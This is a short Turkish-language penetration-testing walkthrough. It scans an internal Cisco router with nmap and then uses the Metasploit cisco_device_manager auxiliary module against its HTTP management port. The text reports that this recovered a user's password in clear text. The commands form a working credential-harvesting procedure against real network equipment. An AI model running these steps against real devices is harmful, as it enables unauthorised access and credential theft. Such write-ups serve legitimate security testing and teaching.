İç ağda bulunan 172.16.40.20 IP adresli Cisco cihazın HTTP üzerinden yönetimi için 80. portunun açık olduğu görülmektedir.
nmap 172.16.40.20 -sS -Pn -n –open
nmap 172.16.40.20 -p80 -A
Cisco cihazın yönetimi için açık bırakılan bu servisin istismar edilmesi için MSF cisco_device_manager auxiliary modülü kullanılabilir. Metasploit üzerinde ilgili modülün seçenekleri aşağıdaki gibidir:
search cisco_device_manager
use auxiliary/scanner/http/cisco_device_manager
show options
İç ağda tespit edilen 172.16.40.20 IP adresli Router hedef olarak modüle verilebilir.
set RHOSTS 172.16.40.20
show options
Ayarlamalar tamamlandıktan sonra, modül çalıştırılır. Modül çalıştırıldığında aktif cihazdan bir takım kritik bilgilerin elde edildiği görülmektedir. Örnek olarak bir cihaz kullanıcısının kodlanmış (encoded) parolası açık olarak (decoded – clear text) elde edilmiştir.
run
Not: Erişim için kimlik bilgileri gerekirse, USERNAME ve PASSWORD seçenekleri ayarlanabilir.